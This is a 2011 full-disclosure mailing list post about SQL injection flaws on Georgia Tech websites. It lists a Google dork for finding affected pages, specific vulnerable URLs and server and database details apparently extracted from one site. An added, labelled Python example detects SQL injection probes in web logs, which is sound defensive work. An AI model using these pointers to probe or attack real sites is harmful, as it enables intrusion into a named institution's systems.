Message-Id: <8CD818AC3AD532C-D04-1789@web-mmc-m02.sysops.aol.com>
Date: Thu, 13 Jan 2011 17:45:51 -0500
From: cats@...l.net
To: full-disclosure@...ts.grok.org.uk
Subject: gatech.edu, multiple remote SQL injection vulnerabilities


 *********************************************************
#                        Georgia Tech                             
#   Multiple remote SQL Injection Vulnerabilities       
*********************************************************
#                                                                    
#               Author: cats                                   
#               Domain: gatech.edu                       
#                                                       
# [1] Description                                       
# [2] Extracted sample data                             
# [3] Vulnerabilities and details                       
#                                                       
*********************************************************


[1] Description

A large number of vulnerabilities have been found in just
about every site and service that gatech.edu has online.
The ones listed here in this document are just a small
amount of the real deal, and these are only SQL injections,
which seem to be their biggest issue. And with a simple
Google dork, a lot more vulnerabilities can be found
under this domain.

Since one of their issues lies in /news/event.php, a
simple Google search of that within the domain will show
a lot of their affected sites.

https://encrypted.google.com/search?q=allinurl:+/news/event.php%3Fid%3D+site:gatech.edu&hl=en

The people responsible for these services have been notified.

A very limited amount of sensitive information will be
disclosed in this document (apart from the vulnerabilities). 


[2] Extracted sample data

IP: 130.207.160.82
URL: http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21
Database username: studentaffairs@...-plesk1.gatech.edu
Database name: studentaffairs
Database Version : 5.1.40-community-log
Number of tables in database: 228


[3] Vulnerabilities and details


Other (Mostly new ones, not checked for blind or visible SQLi)

(Needs POST data, use the search field)
http://www2.me.gatech.edu/www/theses/Search.asp


#End of file
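
Added example, not part of the original post: a check a site operator could run over web access logs to find boolean-test and stray-quote values in query parameters such as the id parameter of /news/event.php named in the description. The Combined Log Format, the client addresses and the id values are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Boolean test appended to a value, e.g. "AND 1=1", "AND 1=2", "' OR 1='1"
BOOL_TEST = re.compile(r"(?i)\b(and|or)\s+'?(\d+)'?\s*=\s*'?(\d+)'?")
# Combined Log Format (assumed): client address, then the quoted request line
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Constructed sample log lines (documentation address ranges, made-up ids)
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Jan/2011:10:00:01 -0500] "GET /news/event.php?id=100%20AND%201=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Jan/2011:10:00:02 -0500] "GET /news/event.php?id=100%20AND%201=2 HTTP/1.1" 200 812',
    '192.0.2.44 - - [13/Jan/2011:10:00:05 -0500] "GET /news/event.php?id=100 HTTP/1.1" 200 5120',
    '192.0.2.9 - - [13/Jan/2011:10:01:10 -0500] "GET /news/story.php?id=7%27 HTTP/1.1" 500 310',
]

def classify(value):
    """Label a decoded parameter value as a probe type, or return None."""
    m = BOOL_TEST.search(value)
    if m:
        # Equal operands form an always-true test, unequal an always-false one
        return "bool-true" if m.group(2) == m.group(3) else "bool-false"
    if value.rstrip().endswith("'"):
        return "stray-quote"
    return None

def scan(lines):
    """Return (findings, paired).

    findings: (client, path, parameter, label) for every suspicious value.
    paired:   (client, path, parameter) where one client sent both a true and
              a false test, the signature of response-difference testing.
    """
    findings, seen = [], defaultdict(set)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so %20 and %27 are matched as ' ' and "'"
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            label = classify(value)
            if label:
                findings.append((client, parts.path, name, label))
                seen[(client, parts.path, name)].add(label)
    paired = sorted(k for k, v in seen.items() if {"bool-true", "bool-false"} <= v)
    return findings, paired
```

A paired hit marks an endpoint whose handling of that parameter should be reviewed first, with the value bound through a parameterized query rather than concatenated into SQL.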

 


